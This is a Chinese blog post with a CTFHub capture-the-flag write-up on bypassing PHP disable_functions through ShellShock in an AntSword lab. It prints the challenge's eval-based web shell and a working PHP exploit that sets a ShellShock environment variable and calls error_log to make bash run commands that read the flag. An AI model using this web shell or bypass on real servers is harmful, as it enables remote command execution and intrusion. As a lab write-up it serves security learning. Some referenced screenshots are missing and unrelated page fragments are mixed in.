首页 >> 大全

web进阶

2023-09-21 大全 18 作者:考证青年

-web进阶-

题目描述:

利用PHP破壳完成

CTFHub Bypass disable_function —— ShellShock
本环境来源于AntSword-Labs<!DOCTYPE html>
<html>
<head><title>CTFHub Bypass disable_function —— ShellShock</title><meta charset="UTF-8">
</head>
<body>
<h1>CTFHub Bypass disable_function —— ShellShock</h1>
<p>本环境来源于<a href="https://github.com/AntSwordProject/AntSword-Labs">AntSword-Labs</a></p>
</body>
</html>
<?php
@eval($_REQUEST['ant']);
show_source(__FILE__);
?>

蚁剑连接后,发现只能点击网站根目录下的东西,其他的文件以及目录都没有权限,这时可以试试蚁剑的插件,发现有个的模式可以利用

进阶web语言__古剑奇谭web进阶数据

(主要是自己没有直接在虚拟终端试成功,但很多师傅说蚁剑是直接集成了的环境,可以不需要其他操作就只需要在虚拟终端中输命令就行了,所以可能是我自己的操作有问题,大家可以试试直接在虚拟终端上进行命令执行)

然后在使用了后,可以在终端上进行命令执行:

第二种方法:

_古剑奇谭web进阶数据_进阶web语言

利用脚本去进行

在编写脚本之前,得先知道个东西,就是在一般情况下,系统里面的shell进程是有严格的权限控制的,但在bash运行过程中,它会调用操作系统的环境变量,所以我们可以通过设置环境变量来执行任意bash命令


putenv("PHP_hack=() { :; }; tac /flag > /var/www/html/hack.php");
error_log("",1,"","");
?>

将这串代码上传到网站目录下,然后访问hack.php,最后查看根目录下的hack.php即可:

关于我们

最火推荐

小编推荐

联系我们


版权声明:本站内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 88@qq.com 举报,一经查实,本站将立刻删除。备案号:桂ICP备2021009421号
Powered By Z-BlogPHP.
复制成功
微信号:
我知道了